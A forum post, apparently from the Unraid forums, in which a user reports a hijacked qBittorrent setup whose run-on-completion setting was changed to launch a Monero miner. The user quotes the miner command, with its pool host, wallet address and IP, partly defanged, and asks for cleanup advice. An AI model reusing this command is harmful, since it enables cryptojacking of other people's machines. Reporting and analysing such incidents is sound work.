tower-diagnostics-20210830-1839.zipI was away from home last night, and when I came back from work today, I noticed that my CPU was nearly maxed out. This was odd, but does happen sometimes. However, I went into my torrent client (qbittorrent), and found that all of my torrents had been deleted and had been replaced with a single torrent for some kind of Italian music.
It should go without saying that I have never heard of this music nor did I seek it out. I went into my logs for qbt, and found the following:
I have no idea what those ports I circled are; I have never used them to my knowledge. I also found in my settings that some code was marked to be executed upon completion of the torrent:
/tmp/x -o pool.suppo[CODE NEUTER]rtxmr.com:443 -u 8C2GLAN7wPEDE7xAiCLYBwdPtjc3B5pWH[CODE NEUTER]44989qMTmwSjbKmm2Y1Zog9UJWchsnrkjF4qkr7CbCtUAS4QGWyxhRW7Vfg5RZ -k --tls -o 107.173.34.104:9090
The [CODE NEUTER]s were added by me to prevent any accidental activation
Furthermore, the logs Unraid gives me for qbt show this:
All in all, I take this to mean that someone hijacked my system to run some kind of mining software. I can see in the logs here that the line of code to be run on completion was changed a few times, I assume this was the hacker setting up their system.
I've already done what I can to stop any further access and stop any illicit activity, but I'm worried about making sure there isn't any lasting damage or compromise. I am not very well versed with this stuff, so I would appreciate any suggestions.
I have attached my diag file
https://forums.unraid.net/applications/core/interface/file/attachment.php?id=125259&key=7d5b734ea2581f6305efd6e1c07edb66